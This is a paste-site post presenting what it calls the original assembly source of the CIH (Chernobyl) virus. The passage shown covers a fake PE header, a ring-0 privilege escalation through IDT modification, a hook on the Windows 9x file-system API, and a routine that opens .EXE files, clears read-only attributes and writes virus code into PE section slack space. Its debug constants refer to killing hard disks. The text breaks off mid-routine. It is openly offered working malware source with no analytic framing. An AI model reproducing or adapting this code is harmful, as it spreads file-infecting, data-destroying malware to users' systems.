FlyFar

Original Sourcecode Of The Chernobyl Virus (CIH)

Oct 21st, 2021
  1. OriginalAppEXE SEGMENT
  2.  
  3. FileHeader:
  4. db 04dh, 05ah, 090h, 000h, 003h, 000h, 000h, 000h
  5. db 004h, 000h, 000h, 000h, 0ffh, 0ffh, 000h, 000h
  6. db 0b8h, 000h, 000h, 000h, 000h, 000h, 000h, 000h
  7. db 040h, 000h, 000h, 000h, 000h, 000h, 000h, 000h
  8. db 000h, 000h, 000h, 000h, 000h, 000h, 000h, 000h
  9. db 000h, 000h, 000h, 000h, 000h, 000h, 000h, 000h
  10. db 000h, 000h, 000h, 000h, 000h, 000h, 000h, 000h
  11. db 000h, 000h, 000h, 000h, 080h, 000h, 000h, 000h
  12. db 00eh, 01fh, 0bah, 00eh, 000h, 0b4h, 009h, 0cdh
  13. db 021h, 0b8h, 001h, 04ch, 0cdh, 021h, 054h, 068h
  14. db 069h, 073h, 020h, 070h, 072h, 06fh, 067h, 072h
  15. db 061h, 06dh, 020h, 063h, 061h, 06eh, 06eh, 06fh
  16. db 074h, 020h, 062h, 065h, 020h, 072h, 075h, 06eh
  17. db 020h, 069h, 06eh, 020h, 044h, 04fh, 053h, 020h
  18. db 06dh, 06fh, 064h, 065h, 02eh, 00dh, 00dh, 00ah
  19. db 024h, 000h, 000h, 000h, 000h, 000h, 000h, 000h
  20. db 050h, 045h, 000h, 000h, 04ch, 001h, 001h, 000h
  21. db 0f1h, 068h, 020h, 035h, 000h, 000h, 000h, 000h
  22. db 000h, 000h, 000h, 000h, 0e0h, 000h, 00fh, 001h
  23. db 00bh, 001h, 005h, 000h, 000h, 010h, 000h, 000h
  24. db 000h, 000h, 000h, 000h, 000h, 000h, 000h, 000h
  25. db 010h, 010h, 000h, 000h, 000h, 010h, 000h, 000h
  26. db 000h, 020h, 000h, 000h, 000h, 000h, 040h, 000h
  27. db 000h, 010h, 000h, 000h, 000h, 002h, 000h, 000h
  28. db 004h, 000h, 000h, 000h, 000h, 000h, 000h, 000h
  29. db 004h, 000h, 000h, 000h, 000h, 000h, 000h, 000h
  30. db 000h, 020h, 000h, 000h, 000h, 002h, 000h, 000h
  31. db 000h, 000h, 000h, 000h, 002h, 000h, 000h, 000h
  32. db 000h, 000h, 010h, 000h, 000h, 010h, 000h, 000h
  33. db 000h, 000h, 010h, 000h, 000h, 010h, 000h, 000h
  34. db 000h, 000h, 000h, 000h, 010h, 000h, 000h, 000h
  35. db 000h, 000h, 000h, 000h, 000h, 000h, 000h, 000h
  36. db 000h, 000h, 000h, 000h, 000h, 000h, 000h, 000h
  37. db 000h, 000h, 000h, 000h, 000h, 000h, 000h, 000h
  38. db 000h, 000h, 000h, 000h, 000h, 000h, 000h, 000h
  39. db 000h, 000h, 000h, 000h, 000h, 000h, 000h, 000h
  40. db 000h, 000h, 000h, 000h, 000h, 000h, 000h, 000h
  41. db 000h, 000h, 000h, 000h, 000h, 000h, 000h, 000h
  42. db 000h, 000h, 000h, 000h, 000h, 000h, 000h, 000h
  43. db 000h, 000h, 000h, 000h, 000h, 000h, 000h, 000h
  44. db 000h, 000h, 000h, 000h, 000h, 000h, 000h, 000h
  45. db 000h, 000h, 000h, 000h, 000h, 000h, 000h, 000h
  46. db 000h, 000h, 000h, 000h, 000h, 000h, 000h, 000h
  47. db 000h, 000h, 000h, 000h, 000h, 000h, 000h, 000h
  48. db 000h, 000h, 000h, 000h, 000h, 000h, 000h, 000h
  49. db 000h, 000h, 000h, 000h, 000h, 000h, 000h, 000h
  50. db 000h, 000h, 000h, 000h, 000h, 000h, 000h, 000h
  51. db 02eh, 074h, 065h, 078h, 074h, 000h, 000h, 000h
  52. db 000h, 010h, 000h, 000h, 000h, 010h, 000h, 000h
  53. db 000h, 010h, 000h, 000h, 000h, 002h, 000h, 000h
  54. db 000h, 000h, 000h, 000h, 000h, 000h, 000h, 000h
  55. db 000h, 000h, 000h, 000h, 020h, 000h, 000h, 060h
  56. db 000h, 000h, 000h, 000h, 000h, 000h, 000h, 000h
  57. db 000h, 000h, 000h, 000h, 000h, 000h, 000h, 000h
  58. db 000h, 000h, 000h, 000h, 000h, 000h, 000h, 000h
  59. db 000h, 000h, 000h, 000h, 000h, 000h, 000h, 000h
  60. db 000h, 000h, 000h, 000h, 000h, 000h, 000h, 000h
  61. db 000h, 000h, 000h, 000h, 000h, 000h, 000h, 000h
  62. db 000h, 000h, 000h, 000h, 000h, 000h, 000h, 000h
  63. db 000h, 000h, 000h, 000h, 000h, 000h, 000h, 000h
  64. db 000h, 000h, 000h, 000h, 000h, 000h, 000h, 000h
  65. db 000h, 000h, 000h, 000h, 000h, 000h, 000h, 000h
  66. db 000h, 000h, 000h, 000h, 000h, 000h, 000h, 000h
  67. db 000h, 000h, 000h, 000h, 000h, 000h, 000h, 000h
  68. db 0c3h, 000h, 000h, 000h, 000h, 000h, 000h, 000h
  69. dd 00000000h, VirusSize
  70.  
  71. OriginalAppEXE ENDS
  72.  
  73. ; ****************************************************************************
  74. ; * My Virus Game *
  75. ; ****************************************************************************
  76.  
  77. ; *********************************************************
  78. ; * Constant Define *
  79. ; *********************************************************
  80.  
  81. TRUE = 1
  82. FALSE = 0
  83.  
  84. DEBUG = TRUE
  85.  
  86. MajorVirusVersion = 1
  87. MinorVirusVersion = 4
  88.  
  89. VirusVersion = MajorVirusVersion*10h+MinorVirusVersion
  90.  
  91.  
  92. IF DEBUG
  93.  
  94. FirstKillHardDiskNumber = 81h
  95. HookExceptionNumber = 05h
  96.  
  97. ELSE
  98.  
  99. FirstKillHardDiskNumber = 80h
  100. HookExceptionNumber = 03h
  101.  
  102. ENDIF
  103.  
  104.  
  105. FileNameBufferSize = 7fh
  106.  
  107. ; *********************************************************
  108. ; *********************************************************
  109.  
  110. VirusGame SEGMENT
  111.  
  112. ASSUME CS:VirusGame, DS:VirusGame, SS:VirusGame
  113. ASSUME ES:VirusGame, FS:VirusGame, GS:VirusGame
  114.  
  115. ; *********************************************************
  116. ; * Ring3 Virus Game Initial Program *
  117. ; *********************************************************
  118.  
  119. MyVirusStart:
  120. push ebp
  121.  
  122. ; *************************************
  123. ; * Let's Modify Structured Exception *
  124. ; * Handling, Prevent Exception Error *
  125. ; * Occurrence, Especially in NT. *
  126. ; *************************************
  127.  
  128. lea eax, [esp-04h*2]
  129.  
  130. xor ebx, ebx
  131. xchg eax, fs:[ebx]
  132.  
  133. call @0
  134. @0:
  135. pop ebx
  136.  
  137. lea ecx, StopToRunVirusCode-@0[ebx]
  138. push ecx
  139.  
  140. push eax
  141.  
  142. ; *************************************
  143. ; * Let's Modify *
  144. ; * IDT(Interrupt Descriptor Table) *
  145. ; * to Get Ring0 Privilege... *
  146. ; *************************************
  147.  
  148. push eax ;
  149. sidt [esp-02h] ; Get IDT Base Address
  150. pop ebx ;
  151.  
  152. add ebx, HookExceptionNumber*08h+04h ; ZF = 0
  153.  
  154. cli
  155.  
  156. mov ebp, [ebx] ; Get Exception Base
  157. mov bp, [ebx-04h] ; Entry Point
  158.  
  159. lea esi, MyExceptionHook-@1[ecx]
  160.  
  161. push esi
  162.  
  163. mov [ebx-04h], si ;
  164. shr esi, 16 ; Modify Exception
  165. mov [ebx+02h], si ; Entry Point Address
  166.  
  167. pop esi
  168.  
  169. ; *************************************
  170. ; * Generate Exception to Get Ring0 *
  171. ; *************************************
  172.  
  173. int HookExceptionNumber ; GenerateException
  174. ReturnAddressOfEndException = $
  175.  
  176. ; *************************************
  177. ; * Merge All Virus Code Section *
  178. ; *************************************
  179.  
  180. push esi
  181. mov esi, eax
  182.  
  183. LoopOfMergeAllVirusCodeSection:
  184.  
  185. mov ecx, [eax-04h]
  186.  
  187. rep movsb
  188.  
  189. sub eax, 08h
  190.  
  191. mov esi, [eax]
  192.  
  193. or esi, esi
  194. jz QuitLoopOfMergeAllVirusCodeSection ; ZF = 1
  195.  
  196. jmp LoopOfMergeAllVirusCodeSection
  197.  
  198. QuitLoopOfMergeAllVirusCodeSection:
  199.  
  200. pop esi
  201.  
  202. ; *************************************
  203. ; * Generate Exception Again *
  204. ; *************************************
  205.  
  206. int HookExceptionNumber ; GenerateException Again
  207.  
  208. ; *************************************
  209. ; * Let's Restore *
  210. ; * Structured Exception Handling *
  211. ; *************************************
  212.  
  213. ReadyRestoreSE:
  214. sti
  215.  
  216. xor ebx, ebx
  217.  
  218. jmp RestoreSE
  219.  
  220. ; *************************************
  221. ; * When Exception Error Occurs, *
  222. ; * Our OS System should be in NT. *
  223. ; * So My Cute Virus will not *
  224. ; * Continue to Run, it Jumps to *
  225. ; * Original Application to Run. *
  226. ; *************************************
  227.  
  228. StopToRunVirusCode:
  229. @1 = StopToRunVirusCode
  230.  
  231. xor ebx, ebx
  232. mov eax, fs:[ebx]
  233. mov esp, [eax]
  234.  
  235. RestoreSE:
  236. pop dword ptr fs:[ebx]
  237. pop eax
  238.  
  239. ; *************************************
  240. ; * Return Original App to Execute *
  241. ; *************************************
  242.  
  243. pop ebp
  244.  
  245. push 00401000h ; Push Original
  246. OriginalAddressOfEntryPoint = $-4 ; App Entry Point to Stack
  247.  
  248. ret ; Return to Original App Entry Point
  249.  
  250. ; *********************************************************
  251. ; * Ring0 Virus Game Initial Program *
  252. ; *********************************************************
  253.  
  254. MyExceptionHook:
  255. @2 = MyExceptionHook
  256.  
  257. jz InstallMyFileSystemApiHook
  258.  
  259. ; *************************************
  260. ; * Do My Virus Exist in System !? *
  261. ; *************************************
  262.  
  263. mov ecx, dr0
  264. jecxz AllocateSystemMemoryPage
  265.  
  266. add dword ptr [esp], ReadyRestoreSE-ReturnAddressOfEndException
  267.  
  268. ; *************************************
  269. ; * Return to Ring3 Initial Program *
  270. ; *************************************
  271.  
  272. ExitRing0Init:
  273. mov [ebx-04h], bp ;
  274. shr ebp, 16 ; Restore Exception
  275. mov [ebx+02h], bp ;
  276.  
  277. iretd
  278.  
  279. ; *************************************
  280. ; * Allocate SystemMemory Page to Use *
  281. ; *************************************
  282.  
  283. AllocateSystemMemoryPage:
  284.  
  285. mov dr0, ebx ; Set the Mark of My Virus Exist in System
  286.  
  287. push 00000000fh ;
  288. push ecx ;
  289. push 0ffffffffh ;
  290. push ecx ;
  291. push ecx ;
  292. push ecx ;
  293. push 000000001h ;
  294. push 000000002h ;
  295. int 20h ; VMMCALL _PageAllocate
  296. _PageAllocate = $ ;
  297. dd 00010053h ; Use EAX, ECX, EDX, and flags
  298. add esp, 08h*04h
  299.  
  300. xchg edi, eax ; EDI = SystemMemory Start Address
  301.  
  302. lea eax, MyVirusStart-@2[esi]
  303.  
  304. iretd ; Return to Ring3 Initial Program
  305.  
  306. ; *************************************
  307. ; * Install My File System Api Hook *
  308. ; *************************************
  309.  
  310. InstallMyFileSystemApiHook:
  311.  
  312. lea eax, FileSystemApiHook-@6[edi]
  313.  
  314. push eax ;
  315. int 20h ; VXDCALL IFSMgr_InstallFileSystemApiHook
  316. IFSMgr_InstallFileSystemApiHook = $ ;
  317. dd 00400067h ; Use EAX, ECX, EDX, and flags
  318.  
  319. mov dr0, eax ; Save OldFileSystemApiHook Address
  320.  
  321. pop eax ; EAX = FileSystemApiHook Address
  322.  
  323. ; Save Old IFSMgr_InstallFileSystemApiHook Entry Point
  324. mov ecx, IFSMgr_InstallFileSystemApiHook-@2[esi]
  325. mov edx, [ecx]
  326. mov OldInstallFileSystemApiHook-@3[eax], edx
  327.  
  328. ; Modify IFSMgr_InstallFileSystemApiHook Entry Point
  329. lea eax, InstallFileSystemApiHook-@3[eax]
  330. mov [ecx], eax
  331.  
  332. cli
  333.  
  334. jmp ExitRing0Init
  335.  
  336. ; *********************************************************
  337. ; * Code Size of Merge Virus Code Section *
  338. ; *********************************************************
  339.  
  340. CodeSizeOfMergeVirusCodeSection = offset $
  341.  
  342. ; *********************************************************
  343. ; * IFSMgr_InstallFileSystemApiHook *
  344. ; *********************************************************
  345.  
  346. InstallFileSystemApiHook:
  347. push ebx
  348.  
  349. call @4 ;
  350. @4: ;
  351. pop ebx ; mov ebx, offset FileSystemApiHook
  352. add ebx, FileSystemApiHook-@4 ;
  353.  
  354. push ebx
  355. int 20h ; VXDCALL IFSMgr_RemoveFileSystemApiHook
  356. IFSMgr_RemoveFileSystemApiHook = $
  357. dd 00400068h ; Use EAX, ECX, EDX, and flags
  358. pop eax
  359.  
  360. ; Call Original IFSMgr_InstallFileSystemApiHook
  361. ; to Link Client FileSystemApiHook
  362. push dword ptr [esp+8]
  363. call OldInstallFileSystemApiHook-@3[ebx]
  364. pop ecx
  365.  
  366. push eax
  367.  
  368. ; Call Original IFSMgr_InstallFileSystemApiHook
  369. ; to Link My FileSystemApiHook
  370. push ebx
  371. call OldInstallFileSystemApiHook-@3[ebx]
  372. pop ecx
  373.  
  374. mov dr0, eax ; Adjust OldFileSystemApiHook Address
  375.  
  376. pop eax
  377.  
  378. pop ebx
  379.  
  380. ret
  381.  
  382. ; *********************************************************
  383. ; * Static Data *
  384. ; *********************************************************
  385.  
  386. OldInstallFileSystemApiHook dd ?
  387.  
  388. ; *********************************************************
  389. ; * IFSMgr_FileSystemHook *
  390. ; *********************************************************
  391.  
  392. ; *************************************
  393. ; * IFSMgr_FileSystemHook Entry Point *
  394. ; *************************************
  395.  
  396. FileSystemApiHook:
  397. @3 = FileSystemApiHook
  398.  
  399. pushad
  400.  
  401. call @5 ;
  402. @5: ;
  403. pop esi ; mov esi, offset VirusGameDataStartAddress
  404. add esi, VirusGameDataStartAddress-@5
  405.  
  406. ; *************************************
  407. ; * Is OnBusy !? *
  408. ; *************************************
  409.  
  410. test byte ptr (OnBusy-@6)[esi], 01h ; if ( OnBusy )
  411. jnz pIFSFunc ; goto pIFSFunc
  412.  
  413. ; *************************************
  414. ; * Is OpenFile !? *
  415. ; *************************************
  416.  
  417. ; if ( NotOpenFile )
  418. ; goto prevhook
  419. lea ebx, [esp+20h+04h+04h]
  420. cmp dword ptr [ebx], 00000024h
  421. jne prevhook
  422.  
  423. ; *************************************
  424. ; * Enable OnBusy *
  425. ; *************************************
  426.  
  427. inc byte ptr (OnBusy-@6)[esi] ; Enable OnBusy
  428.  
  429. ; *************************************
  430. ; * Get FilePath's DriveNumber, *
  431. ; * then Set the DriveName to *
  432. ; * FileNameBuffer. *
  433. ; *************************************
  434. ; * Ex. If DriveNumber is 03h, *
  435. ; * DriveName is 'C:'. *
  436. ; *************************************
  437.  
  438. ; mov esi, offset FileNameBuffer
  439. add esi, FileNameBuffer-@6
  440.  
  441. push esi
  442.  
  443. mov al, [ebx+04h]
  444. cmp al, 0ffh
  445. je CallUniToBCSPath
  446.  
  447. add al, 40h
  448. mov ah, ':'
  449.  
  450. mov [esi], eax
  451.  
  452. inc esi
  453. inc esi
  454.  
  455. ; *************************************
  456. ; * UniToBCSPath *
  457. ; *************************************
  458. ; * This Service Converts *
  459. ; * a Canonicalized Unicode Pathname *
  460. ; * to a Normal Pathname in the *
  461. ; * Specified BCS Character Set. *
  462. ; *************************************
  463.  
  464. CallUniToBCSPath:
  465. push 00000000h
  466. push FileNameBufferSize
  467. mov ebx, [ebx+10h]
  468. mov eax, [ebx+0ch]
  469. add eax, 04h
  470. push eax
  471. push esi
  472. int 20h ; VXDCall UniToBCSPath
  473. UniToBCSPath = $
  474. dd 00400041h
  475. add esp, 04h*04h
  476.  
  477. ; *************************************
  478. ; * Is FileName '.EXE' !? *
  479. ; *************************************
  480.  
  481. ; cmp [esi+eax-04h], '.EXE'
  482. cmp [esi+eax-04h], 'EXE.'
  483. pop esi
  484. jne DisableOnBusy
  485.  
  486. IF DEBUG
  487.  
  488. ; *************************************
  489. ; * Only for Debug *
  490. ; *************************************
  491.  
  492. ; cmp [esi+eax-06h], 'FUCK'
  493. cmp [esi+eax-06h], 'KCUF'
  494. jne DisableOnBusy
  495.  
  496. ENDIF
  497.  
  498. ; *************************************
  499. ; * Is Open Existing File !? *
  500. ; *************************************
  501.  
  502. ; if ( NotOpenExistingFile )
  503. ; goto DisableOnBusy
  504. cmp word ptr [ebx+18h], 01h
  505. jne DisableOnBusy
  506.  
  507. ; *************************************
  508. ; * Get Attributes of the File *
  509. ; *************************************
  510.  
  511. mov ax, 4300h
  512. int 20h ; VXDCall IFSMgr_Ring0_FileIO
  513. IFSMgr_Ring0_FileIO = $
  514. dd 00400032h
  515.  
  516. jc DisableOnBusy
  517.  
  518. push ecx
  519.  
  520. ; *************************************
  521. ; * Get IFSMgr_Ring0_FileIO Address *
  522. ; *************************************
  523.  
  524. mov edi, dword ptr (IFSMgr_Ring0_FileIO-@7)[esi]
  525. mov edi, [edi]
  526.  
  527. ; *************************************
  528. ; * Is Read-Only File !? *
  529. ; *************************************
  530.  
  531. test cl, 01h
  532. jz OpenFile
  533.  
  534. ; *************************************
  535. ; * Modify Read-Only File to Write *
  536. ; *************************************
  537.  
  538. mov ax, 4301h
  539. xor ecx, ecx
  540. call edi ; VXDCall IFSMgr_Ring0_FileIO
  541.  
  542. ; *************************************
  543. ; * Open File *
  544. ; *************************************
  545.  
  546. OpenFile:
  547. xor eax, eax
  548. mov ah, 0d5h
  549. xor ecx, ecx
  550. xor edx, edx
  551. inc edx
  552. mov ebx, edx
  553. inc ebx
  554. call edi ; VXDCall IFSMgr_Ring0_FileIO
  555.  
  556. xchg ebx, eax ; mov ebx, FileHandle
  557.  
  558. ; *************************************
  559. ; * Need to Restore *
  560. ; * Attributes of the File !? *
  561. ; *************************************
  562.  
  563. pop ecx
  564.  
  565. pushf
  566.  
  567. test cl, 01h
  568. jz IsOpenFileOK
  569.  
  570. ; *************************************
  571. ; * Restore Attributes of the File *
  572. ; *************************************
  573.  
  574. mov ax, 4301h
  575. call edi ; VXDCall IFSMgr_Ring0_FileIO
  576.  
  577. ; *************************************
  578. ; * Is Open File OK !? *
  579. ; *************************************
  580.  
  581. IsOpenFileOK:
  582. popf
  583.  
  584. jc DisableOnBusy
  585.  
  586. ; *************************************
  587. ; * Open File Already Succeed. ^__^ *
  588. ; *************************************
  589.  
  590. push esi ; Push FileNameBuffer Address to Stack
  591.  
  592. pushf ; Now CF = 0, Push Flag to Stack
  593.  
  594. add esi, DataBuffer-@7 ; mov esi, offset DataBuffer
  595.  
  596. ; ***************************
  597. ; * Get OffsetToNewHeader *
  598. ; ***************************
  599.  
  600. xor eax, eax
  601. mov ah, 0d6h
  602.  
  603. ; For Doing Minimal VirusCode's Length,
  604. ; I Save EAX to EBP.
  605. mov ebp, eax
  606.  
  607. push 00000004h
  608. pop ecx
  609. push 0000003ch
  610. pop edx
  611. call edi ; VXDCall IFSMgr_Ring0_FileIO
  612.  
  613. mov edx, [esi]
  614.  
  615. ; ***************************
  616. ; * Get 'PE\0' Signature *
  617. ; * of ImageFileHeader, and *
  618. ; * Infected Mark. *
  619. ; ***************************
  620.  
  621. dec edx
  622.  
  623. mov eax, ebp
  624. call edi ; VXDCall IFSMgr_Ring0_FileIO
  625.  
  626. ; ***************************
  627. ; * Is PE !? *
  628. ; ***************************
  629. ; * Is the File *
  630. ; * Already Infected !? *
  631. ; ***************************
  632. ; * WinZip Self-Extractor *
  633. ; * doesn't Have Infected *
  634. ; * Mark Because My Virus *
  635. ; * doesn't Infect it. *
  636. ; ***************************
  637.  
  638. ; cmp [esi], '\0PE\0'
  639. cmp dword ptr [esi], 00455000h
  640. jne CloseFile
  641.  
  642. ; *************************************
  643. ; * The File is ^o^ *
  644. ; * PE(Portable Executable) indeed. *
  645. ; *************************************
  646. ; * The File isn't also Infected. *
  647. ; *************************************
  648.  
  649. ; *************************************
  650. ; * Start to Infect the File *
  651. ; *************************************
  652. ; * Registers Use Status Now : *
  653. ; * *
  654. ; * EAX = 04h *
  655. ; * EBX = File Handle *
  656. ; * ECX = 04h *
  657. ; * EDX = 'PE\0\0' Signature of *
  658. ; * ImageFileHeader Pointer's *
  659. ; * Former Byte. *
  660. ; * ESI = DataBuffer Address ==> @8 *
  661. ; * EDI = IFSMgr_Ring0_FileIO Address *
  662. ; * EBP = D600h ==> Read Data in File *
  663. ; *************************************
  664. ; * Stack Dump : *
  665. ; * *
  666. ; * ESP => ------------------------- *
  667. ; * | EFLAG(CF=0) | *
  668. ; * ------------------------- *
  669. ; * | FileNameBufferPointer | *
  670. ; * ------------------------- *
  671. ; * | EDI | *
  672. ; * ------------------------- *
  673. ; * | ESI | *
  674. ; * ------------------------- *
  675. ; * | EBP | *
  676. ; * ------------------------- *
  677. ; * | ESP | *
  678. ; * ------------------------- *
  679. ; * | EBX | *
  680. ; * ------------------------- *
  681. ; * | EDX | *
  682. ; * ------------------------- *
  683. ; * | ECX | *
  684. ; * ------------------------- *
  685. ; * | EAX | *
  686. ; * ------------------------- *
  687. ; * | Return Address | *
  688. ; * ------------------------- *
  689. ; *************************************
  690.  
  691. push ebx ; Save File Handle
  692.  
  693. push 00h ; Set VirusCodeSectionTableEndMark
  694.  
  695. ; ***************************
  696. ; * Let's Set the *
  697. ; * Virus' Infected Mark *
  698. ; ***************************
  699.  
  700. push 01h ; Size
  701. push edx ; Pointer of File
  702. push edi ; Address of Buffer
  703.  
  704. ; ***************************
  705. ; * Save ESP Register *
  706. ; ***************************
  707.  
  708. mov dr1, esp
  709.  
  710. ; ***************************
  711. ; * Let's Set the *
  712. ; * NewAddressOfEntryPoint *
  713. ; * ( Only First Set Size ) *
  714. ; ***************************
  715.  
  716. push eax ; Size
  717.  
  718. ; ***************************
  719. ; * Let's Read *
  720. ; * Image Header in File *
  721. ; ***************************
  722.  
  723. mov eax, ebp
  724. mov cl, SizeOfImageHeaderToRead
  725. add edx, 07h ; Move EDX to NumberOfSections
  726. call edi ; VXDCall IFSMgr_Ring0_FileIO
  727.  
  728. ; ***************************
  729. ; * Let's Set the *
  730. ; * NewAddressOfEntryPoint *
  731. ; * ( Set Pointer of File, *
  732. ; * Address of Buffer ) *
  733. ; ***************************
  734.  
  735. lea eax, (AddressOfEntryPoint-@8)[edx]
  736. push eax ; Pointer of File
  737.  
  738. lea eax, (NewAddressOfEntryPoint-@8)[esi]
  739. push eax ; Address of Buffer
  740.  
  741. ; ***************************
  742. ; * Move EDX to the Start *
  743. ; * of SectionTable in File *
  744. ; ***************************
  745.  
  746. movzx eax, word ptr (SizeOfOptionalHeader-@8)[esi]
  747. lea edx, [eax+edx+12h]
  748.  
  749. ; ***************************
  750. ; * Let's Get *
  751. ; * Total Size of Sections *
  752. ; ***************************
  753.  
  754. mov al, SizeOfScetionTable
  755.  
  756. ; I Assume NumberOfSections <= 0ffh
  757. mov cl, (NumberOfSections-@8)[esi]
  758.  
  759. mul cl
  760.  
  761. ; ***************************
  762. ; * Let's Set Section Table *
  763. ; ***************************
  764.  
  765. ; Move ESI to the Start of SectionTable
  766. lea esi, (StartOfSectionTable-@8)[esi]
  767.  
  768. push eax ; Size
  769. push edx ; Pointer of File
  770. push esi ; Address of Buffer
  771.  
  772. ; ***************************
  773. ; * The Code Size of Merge *
  774. ; * Virus Code Section and *
  775. ; * Total Size of Virus *
  776. ; * Code Section Table Must *
  777. ; * be Less than or Equal to the *
  778. ; * Unused Space Size of *
  779. ; * Following Section Table *
  780. ; ***************************
  781.  
  782. inc ecx
  783. push ecx ; Save NumberOfSections+1
  784.  
  785. shl ecx, 03h
  786. push ecx ; Save TotalSizeOfVirusCodeSectionTable
  787.  
  788. add ecx, eax
  789. add ecx, edx
  790.  
  791. sub ecx, (SizeOfHeaders-@9)[esi]
  792. not ecx
  793. inc ecx
  794.  
  795. ; Save My Virus First Section Code
  796. ; Size of Following Section Table...
  797. ; ( Not Include the Size of Virus Code Section Table )
  798. push ecx
  799.  
  800. xchg ecx, eax ; ECX = Size of Section Table
  801.  
  802. ; Save Original Address of Entry Point
  803. mov eax, (AddressOfEntryPoint-@9)[esi]
  804. add eax, (ImageBase-@9)[esi]
  805. mov (OriginalAddressOfEntryPoint-@9)[esi], eax
  806.  
  807. cmp word ptr [esp], small CodeSizeOfMergeVirusCodeSection
  808. jl OnlySetInfectedMark
  809.  
  810. ; ***************************
  811. ; * Read All Section Tables *
  812. ; ***************************
  813.  
  814. mov eax, ebp
  815. call edi ; VXDCall IFSMgr_Ring0_FileIO
  816.  
  817. ; ***************************
  818. ; * Full Modify the Bug : *
  819. ; * WinZip Self-Extractor *
  820. ; * Occurs Error... *
  821. ; ***************************
  822. ; * So When User Opens *
  823. ; * WinZip Self-Extractor, *
  824. ; * Virus Doesn't Infect it.*
  825. ; ***************************
  826. ; * First, Virus Gets the *
  827. ; * PointerToRawData in the *
  828. ; * Second Section Table, *
  829. ; * Reads the Section Data, *
  830. ; * and Tests the String of *
  831. ; * 'WinZip(R)'...... *
  832. ; ***************************
  833.  
  834. xchg eax, ebp
  835.  
  836. push 00000004h
  837. pop ecx
  838.  
  839. push edx
  840. mov edx, (SizeOfScetionTable+PointerToRawData-@9)[esi]
  841. add edx, 12h
  842.  
  843. call edi ; VXDCall IFSMgr_Ring0_FileIO
  844.  
  845. ; cmp [esi], 'nZip'
  846. cmp dword ptr [esi], 'piZn'
  847. je NotSetInfectedMark
  848.  
  849. pop edx
  850.  
  851. ; ***************************
  852. ; * Let's Set Total Virus *
  853. ; * Code Section Table *
  854. ; ***************************
  855.  
  856. ; EBX = My Virus First Section Code
  857. ; Size of Following Section Table
  858. pop ebx
  859. pop edi ; EDI = TotalSizeOfVirusCodeSectionTable
  860. pop ecx ; ECX = NumberOfSections+1
  861.  
  862. push edi ; Size
  863.  
  864. add edx, ebp
  865. push edx ; Pointer of File
  866.  
  867. add ebp, esi
  868. push ebp ; Address of Buffer
  869.  
  870. ; ***************************
  871. ; * Set the First Virus *
  872. ; * Code Section Size in *
  873. ; * VirusCodeSectionTable *
  874. ; ***************************
  875.  
  876. lea eax, [ebp+edi-04h]
  877. mov [eax], ebx
  878.  
  879. ; ***************************
  880. ; * Let's Set My Virus *
  881. ; * First Section Code *
  882. ; ***************************
  883.  
  884. push ebx ; Size
  885.  
  886. add edx, edi
  887. push edx ; Pointer of File
  888.  
  889. lea edi, (MyVirusStart-@9)[esi]
  890. push edi ; Address of Buffer
  891.  
  892. ; ***************************
  893. ; * Let's Modify the *
  894. ; * AddressOfEntryPoint to *
  895. ; * My Virus Entry Point *
  896. ; ***************************
  897.  
  898. mov (NewAddressOfEntryPoint-@9)[esi], edx
  899.  
  900. ; ***************************
  901. ; * Setup Initial Data *
  902. ; ***************************
  903.  
  904. lea edx, [esi-SizeOfScetionTable]
  905. mov ebp, offset VirusSize
  906.  
  907. jmp StartToWriteCodeToSections
  908.  
  909. ; ***************************
  910. ; * Write Code to Sections *
  911. ; ***************************
  912.  
  913. LoopOfWriteCodeToSections:
  914.  
  915. add edx, SizeOfScetionTable
  916.  
  917. mov ebx, (SizeOfRawData-@9)[edx]
  918. sub ebx, (VirtualSize-@9)[edx]
  919. jbe EndOfWriteCodeToSections
  920.  
  921. push ebx ; Size
  922.  
  923. sub eax, 08h
  924. mov [eax], ebx
  925.  
  926. mov ebx, (PointerToRawData-@9)[edx]
  927. add ebx, (VirtualSize-@9)[edx]
  928. push ebx ; Pointer of File
  929.  
  930. push edi ; Address of Buffer
  931.  
  932. mov ebx, (VirtualSize-@9)[edx]
  933. add ebx, (VirtualAddress-@9)[edx]
  934. add ebx, (ImageBase-@9)[esi]
  935. mov [eax+4], ebx
  936.  
  937. mov ebx, [eax]
  938. add (VirtualSize-@9)[edx], ebx
  939.  
  940. ; Section contains initialized data ==> 00000040h
  941. ; Section can be Read. ==> 40000000h
  942. or (Characteristics-@9)[edx], 40000040h
  943.  
  944. StartToWriteCodeToSections:
  945.  
  946. sub ebp, ebx
  947. jbe SetVirusCodeSectionTableEndMark
  948.  
  949. add edi, ebx ; Move Address of Buffer
  950.  
  951. EndOfWriteCodeToSections:
  952.  
  953. loop LoopOfWriteCodeToSections
  954.  
  955. ; ***************************
  956. ; * Only Set Infected Mark *
  957. ; ***************************
  958.  
  959. OnlySetInfectedMark:
  960. mov esp, dr1
  961.  
  962. jmp WriteVirusCodeToFile
  963.  
  964. ; ***************************
  965. ; * Not Set Infected Mark *
  966. ; ***************************
  967.  
  968. NotSetInfectedMark:
  969. add esp, 3ch
  970.  
  971. jmp CloseFile
  972.  
  973. ; ***************************
  974. ; * Set Virus Code *
  975. ; * Section Table End Mark *
  976. ; ***************************
  977.  
  978. SetVirusCodeSectionTableEndMark:
  979.  
  980. ; Adjust Size of Virus Section Code to Correct Value
  981. add [eax], ebp
  982. add [esp+08h], ebp
  983.  
  984. ; Set End Mark
  985. xor ebx, ebx
  986. mov [eax-04h], ebx
  987.  
  988. ; ***************************
  989. ; * When VirusGame Calls *
  990. ; * VxDCall, VMM Modifies *
  991. ; * the 'int 20h' and the *
  992. ; * 'Service Identifier' *
  993. ; * to 'Call [XXXXXXXX]'. *
  994. ; ***************************
  995. ; * Before Writing My Virus *
  996. ; * to File, I Must Restore *
  997. ; * them First. ^__^ *
  998. ; ***************************
  999.  
  1000. lea eax, (LastVxDCallAddress-2-@9)[esi]
  1001.  
  1002. mov cl, VxDCallTableSize
  1003.  
  1004. LoopOfRestoreVxDCallID:
  1005. mov word ptr [eax], 20cdh
  1006.  
  1007. mov edx, (VxDCallIDTable+(ecx-1)*04h-@9)[esi]
  1008. mov [eax+2], edx
  1009.  
  1010. movzx edx, byte ptr (VxDCallAddressTable+ecx-1-@9)[esi]
  1011. sub eax, edx
  1012.  
  1013. loop LoopOfRestoreVxDCallID
  1014.  
  1015. ; ***************************
  1016. ; * Let's Write *
  1017. ; * Virus Code to the File *
  1018. ; ***************************
  1019.  
  1020. WriteVirusCodeToFile:
  1021. mov eax, dr1
  1022. mov ebx, [eax+10h]
  1023. mov edi, [eax]
  1024.  
  1025. LoopOfWriteVirusCodeToFile:
  1026.  
  1027. pop ecx
